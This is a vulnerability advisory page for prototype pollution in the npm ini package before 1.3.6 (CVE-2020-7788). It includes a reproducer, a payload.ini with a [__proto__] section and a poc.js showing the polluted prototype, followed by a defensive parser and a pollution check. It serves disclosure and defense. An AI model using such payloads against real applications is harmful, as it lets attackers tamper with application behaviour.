Ecosyste.ms: Advisories

An open API service providing security vulnerability metadata for many open source software ecosystems.

Security Advisories: MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLXFxZ3gtMnAyaC05YzM3

ini before 1.3.6 vulnerable to Prototype Pollution via ini.parse

Overview

The ini npm package before version 1.3.6 has a Prototype Pollution vulnerability.

If an attacker submits a malicious INI file to an application that parses it with ini.parse, they pollute the application's Object.prototype: every object in the process then inherits the attacker-chosen properties. This can be exploited further depending on the context.

Patches

This has been patched in 1.3.6.

Steps to reproduce

payload.ini:

[__proto__]
polluted = "polluted"

poc.js:

var fs = require('fs')
var ini = require('ini')

// ini < 1.3.6 treats [__proto__] as an ordinary section name, so the
// assignment lands on Object.prototype. The parsed object itself stays
// empty, but every object (including the global object) now inherits
// the "polluted" property, which is why the bare identifier resolves.
var parsed = ini.parse(fs.readFileSync('./payload.ini', 'utf-8'))
console.log(parsed)
console.log(parsed.__proto__)
console.log(polluted)

Output:

> node poc.js
{}
{ polluted: 'polluted' }
{ polluted: 'polluted' }
polluted
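The fix in 1.3.6 boils down to not letting a section or key name reach the prototype chain. The following is an added example, not code from the ini package or from the advisory, showing the two defenses together in a minimal INI parser: results are built as null-prototype objects (so "__proto__" has no special meaning on them), and the keys that would otherwise reach Object.prototype are dropped and reported. It also includes a small check an application can run after parsing untrusted input to detect pollution. The sample input PAYLOAD is constructed here from the advisory's payload.ini plus a benign section; safeParseIni and prototypeIsPolluted are names chosen for this example.

```javascript
// Keys that, on an ordinary object, write into the prototype chain instead of the object.
const DANGEROUS_KEYS = new Set(['__proto__', 'constructor', 'prototype']);

// Parse INI text into nested null-prototype objects.
// Sections or keys named __proto__/constructor/prototype are not stored;
// they are collected in `rejected` so the caller can log or refuse the input.
function safeParseIni(text) {
  const root = Object.create(null);   // no Object.prototype behind this object
  let current = root;
  const rejected = [];

  for (const rawLine of text.split(/\r?\n/)) {
    const line = rawLine.trim();
    if (line === '' || line.startsWith(';') || line.startsWith('#')) continue;

    const section = /^\[\s*(.+?)\s*\]$/.exec(line);
    if (section) {
      const name = section[1];
      if (DANGEROUS_KEYS.has(name)) {
        rejected.push(name);
        current = Object.create(null); // sink: keys under this section are discarded
        continue;
      }
      if (!(name in root)) root[name] = Object.create(null);
      current = root[name];
      continue;
    }

    const eq = line.indexOf('=');
    if (eq === -1) continue;          // not a key = value line; ignore
    const key = line.slice(0, eq).trim();
    let value = line.slice(eq + 1).trim();
    if (/^".*"$/.test(value)) value = value.slice(1, -1); // strip surrounding quotes
    if (DANGEROUS_KEYS.has(key)) {
      rejected.push(key);
      continue;
    }
    current[key] = value;
  }
  return { config: root, rejected };
}

// Post-parse check: did anything land on Object.prototype under this key?
// (The PoC observes the same condition with console.log(polluted).)
function prototypeIsPolluted(probeKey) {
  return Object.prototype.hasOwnProperty.call(Object.prototype, probeKey);
}

// Constructed sample: the advisory's payload plus a benign [database] section.
const PAYLOAD = '[database]\nhost = "localhost"\n\n[__proto__]\npolluted = "polluted"\n';

const result = safeParseIni(PAYLOAD);
console.log(result.config.database.host);     // localhost
console.log(result.rejected);                 // [ '__proto__' ]
console.log(prototypeIsPolluted('polluted')); // false
```

Rejecting the keys and using null-prototype objects are independent; either alone stops this payload, but keeping both means a later refactor that switches to plain `{}` objects does not silently reopen the hole. Treat a non-empty `rejected` list from untrusted input as a signal worth logging.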
Permalink: https://github.com/advisories/GHSA-qqgx-2p2h-9c37
JSON: https://advisories.ecosyste.ms/api/v1/advisories/MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLXFxZ3gtMnAyaC05YzM3
Source: GitHub Advisory Database
Origin: Unspecified
Severity: High
Classification: General
Published: over 3 years ago
Updated: 9 months ago


CVSS Score: 7.3
CVSS vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Identifiers: GHSA-qqgx-2p2h-9c37, CVE-2020-7788
References: Repository: https://github.com/npm/ini
Blast Radius: 46.0

Affected Packages

npm:ini
Dependent packages: 3,846
Dependent repositories: 1,985,226
Downloads: 188,363,419 last month
Affected Version Ranges: < 1.3.6
Fixed in: 1.3.6
All affected versions: 1.0.0, 1.0.1, 1.0.2, 1.0.3, 1.0.4, 1.0.5, 1.1.0, 1.2.0, 1.2.1, 1.3.0, 1.3.1, 1.3.2, 1.3.3, 1.3.4, 1.3.5
All unaffected versions: 1.3.6, 1.3.7, 1.3.8, 2.0.0, 3.0.0, 3.0.1, 4.0.0, 4.1.0, 4.1.1, 4.1.2